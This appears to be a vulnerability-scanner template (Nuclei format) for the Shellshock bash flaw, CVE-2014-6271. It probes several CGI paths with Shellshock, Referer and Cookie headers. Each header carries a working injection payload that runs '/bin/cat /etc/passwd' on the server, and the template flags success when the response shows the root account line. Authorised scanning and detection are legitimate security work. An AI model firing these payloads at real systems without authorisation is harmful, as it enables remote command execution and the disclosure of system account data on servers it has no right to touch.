id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky severity: high description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/cgi-bin/status" - "{{BaseURL}}/cgi-bin/stats" - "{{BaseURL}}/cgi-bin/test" - "{{BaseURL}}/cgi-bin/status/status.cgi" - "{{BaseURL}}/test.cgi" - "{{BaseURL}}/debug.cgi" - "{{BaseURL}}/cgi-bin/test-cgi" headers: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" part: body